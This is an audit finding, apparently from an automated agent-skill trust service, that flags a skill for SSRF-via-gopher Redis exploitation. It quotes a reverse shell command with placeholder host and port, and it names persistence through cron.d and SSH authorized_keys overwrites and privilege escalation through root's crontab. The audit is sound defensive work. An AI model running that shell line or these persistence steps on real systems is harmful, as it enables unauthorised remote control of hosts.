web-ssrf-gopher-redis-rce
Warn
Audited by Gen Agent Trust Hub on Sep 20, 2026
Risk Level: MEDIUMCOMMAND_EXECUTIONPERSISTENCEPRIVILEGE_ESCALATION
Full Analysis
- [COMMAND_EXECUTION]: The skill contains a pre-defined reverse shell payload pattern (
bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1) intended for execution on a remote target. This pattern is a standard high-risk command sequence used to establish an interactive shell. - [PERSISTENCE]: The instructions detail methods for achieving persistent access on the target host by overwriting sensitive system files, specifically crontab entries in
/etc/cron.dand SSH authorized keys in~/.ssh/authorized_keys. - [PRIVILEGE_ESCALATION]: The skill describes methods to escalate privileges on the target system by targeting files owned by the root user, such as the root user's crontab, leveraging the service's potentially elevated permissions.
Audit Metadata